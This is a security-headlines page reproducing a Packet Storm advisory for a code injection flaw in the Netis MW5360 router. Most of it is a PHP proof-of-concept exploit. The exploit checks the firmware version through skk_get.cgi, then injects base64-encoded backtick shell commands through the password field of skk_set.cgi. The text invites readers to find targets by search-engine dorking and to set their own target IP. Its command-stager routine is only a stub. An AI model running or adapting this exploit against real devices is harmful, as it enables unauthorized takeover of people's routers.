Security
Headlines
HeadlinesLatestCVEs

Headline

Netis MW5360 Code Injection

Netis MW5360 suffers from a PHP code injection vulnerability.

Packet Storm
#vulnerability#windows#google#php#auth#firefox
=============================================================================================================================================| # Title     : Netis MW5360 Code Injection Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.netis-systems.com/products/MW5360.html                                                                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 67 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass NetisRouterExploit {    private $targetUri;    private $cmdDelay;    public function __construct($targetUri = '/', $cmdDelay = 30) {        $this->targetUri = $targetUri;        $this->cmdDelay = $cmdDelay;    }    public function executeCommand($cmd) {        // Clean up payload file if command includes chmod        if (strpos($cmd, 'chmod +x') !== false) {            $this->registerFilesForCleanup(trim(explode('+x', $cmd)[1]));        }        // Skip command removal for payload cleanup        if (strpos($cmd, 'rm -f') === false) {            $payload = base64_encode("`$cmd`");            echo "Executing $cmd\n";            $this->sendRequest('/cgi-bin/skk_set.cgi', [                'password' => $payload,                'quick_set' => 'ap',                'app' => 'wan_set_shortcut'            ]);        }    }    public function check() {        echo "Checking if target can be exploited.\n";        $res = $this->sendRequest('/cgi-bin/skk_get.cgi', [            'mode_name' => 'skk_get',            'wl_link' => 0        ]);        if ($res === false || strpos($res['body'], 'version') === false) {            return "Unknown: No valid response received from target.";        }        preg_match('/.?(version).?\s*:\s*.?((\\|[^,])*)/', $res['body'], $matches);        if (isset($matches[2])) {            $version_number = strtoupper(trim(explode('-V', $matches[2])[1]));            $model_number = strtoupper(trim(explode('-V', $matches[2])[0]));            if (strpos($model_number, '-') !== false) {                $model_number = trim(explode('-', $model_number)[1]);            } else {                $model_number = trim(explode('(', $model_number)[1]);            }            if ($model_number == 'MW5360' && version_compare($version_number, '1.0.1.3442', '<=')) {                return "Appears: Version " . $matches[2];            }            return "Safe: Version " . $matches[2];        }        return "Safe";    }    public function exploit() {        echo "Executing exploit with payload.\n";        $this->executeCmdStager(['noconcat' => true, 'delay' => $this->cmdDelay]);    }    private function sendRequest($uri, $postData) {        $url = "http://target_ip" . $this->targetUri . $uri; // Replace 'target_ip' with actual target IP        $options = [            'http' => [                'header'  => "Content-type: application/x-www-form-urlencoded\r\n",                'method'  => 'POST',                'content' => http_build_query($postData),            ],        ];        $context  = stream_context_create($options);        $result = file_get_contents($url, false, $context);        if ($result === FALSE) {            return false;        }        return ['body' => $result];    }    private function registerFilesForCleanup($filename) {        echo "Registering $filename for cleanup.\n";        // Logic to clean up the file after execution.    }    private function executeCmdStager($options) {        echo "Executing command stager with options: " . print_r($options, true) . "\n";        // Implement the command stager logic here    }}// Usage$exploit = new NetisRouterExploit('/');$exploit->check();$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution